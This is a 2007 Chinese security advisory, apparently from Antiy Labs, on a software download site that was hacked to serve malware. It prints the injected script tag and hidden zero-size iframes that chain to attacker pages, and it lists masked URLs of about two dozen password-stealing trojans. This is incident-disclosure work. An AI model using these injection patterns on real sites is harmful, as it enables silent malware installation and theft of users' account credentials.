安全响应·Security
病毒预警·Alarm

木蚂蚁绿色软件园网站挂马事件

出处:安天实验室 2007-10-25 17:00

内容:
 

  10月25日,安天实验室反病毒监测网发现,木蚂蚁绿色软件园网站(http://soft.
mu****.net)被黑客植入病毒,用户如果访问该网站,会被病毒感染。系统就会自动从
恶意网站上下载并运行多个恶意程序。盗取用户敏感信息。
  
  该网站的主页上里被插入如下脚本图所示:

  

  框架代码:
  <script language="javascript" src="http://bbs.9***.com/for.js"></script>。
  http://bbs.94**.com/for.js里被插入一个挂马代码如下代码图2所示:

  

  一个框架
  <iframe src=http://pop.yo****.com/m60.htm?3 width=0 height=0></iframe>
  http://pop.yo****.com/m60.htm得到如下代码:
  
  

  3个框架:
  <iframe src="http://pop.yo****.com/wm/0614.htm"
  width="20" height="0" frameborder="0"></iframe>
  <iframe src="http://pop.yo****.com/wm/xl.htm"
  width="20" height="0" frameborder="0"></iframe>
  <iframe src="http://pop.yo****.com/wm/bai.htm"
  width="20" height="0" frameborder="0"></iframe>
  http://pop.yo****.com/wm/0614.htm插入了代码:
  <script src=http://pop.yo****9.com/wm/0614.js></script>
  http://pop.yo****.com/wm/0614.js得到结果如下:

  

  http://pop.yo****.com/wm/xl.htm被插入脚本代码:
  <script language=javascript src=xl.js></script>
  xl.js网马代码如下:

  

  http://pop.yo****.com/wm/bai.htm的代码如下:

  

  当用户访问www.6t****.cn时,系统会自动隐藏下载以下病毒文件:
  http://doo.yo****.com/0.exe
  病毒名:(Trojan-Dropper.Win32.Mudrop.fc) 变种木马
  
  一旦运行该木马将下载以下病毒到用户的系统,并运行。
  http://doo.yo****.com/1.exe 病毒名:( ) 地址失效

  http://doo.yo****.com/2.exe
  病毒名:(Trojan-PSW.Win32.WOW.aci) 游戏盗号木马

  http://doo.yo****.com/3.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gfe) 盗号木马

  http://doo.yo****.com/4.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fym) 盗号木马

  http://doo.yo****.com/5.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gem) 游戏盗号木马

  http://doo.yo****.com/6.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fuw) 游戏盗号木马

  http://doo.yo****.com/7.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gev) 盗号木马

  http://doo.yo****.com/8.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.doj) 盗号木马

  http://doo.yo****.com/9.exe
  病毒名:(Worm.Win32.QQPass.al) 蠕虫木马

  http://doo.yo****.com/10.exe
  病毒名:(Trojan-PSW.Win32.Lmir.bnx) 游戏木马

  http://doo.yo****.com/11.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ftd) 游戏盗号木马

  http://doo.yo****.com/12.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fzw) 游戏盗号木马

  http://doo.yo****.com/13.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fcw) 游戏盗号木马
  
  http://doo.yo****.com/14.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fsy) 游戏盗号木马

  http://doo.yo****.com/15.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fty) 游戏木马

  http://doo.yo****.com/16.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fyo) 游戏盗号木马

  http://doo.yo****.com/17.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ftl) 游戏木马

  http://doo.yo****.com/18.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fyp) 游戏木马

  http://doo.yo****.com/19.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fzp) 游戏木马

  http://doo.yo****.com/20.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fzm) 游戏木马
  
  http://doo.yo****.com/21.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fwl) 游戏木马
  
  http://doo.yo****.com/22.exe
  病毒名:(Trojan.Win32.Agent.ata) 间谍木马

附:
 

点击此处下载木马防线2005+

病毒上报信箱: submit@virusview.net
[TOP]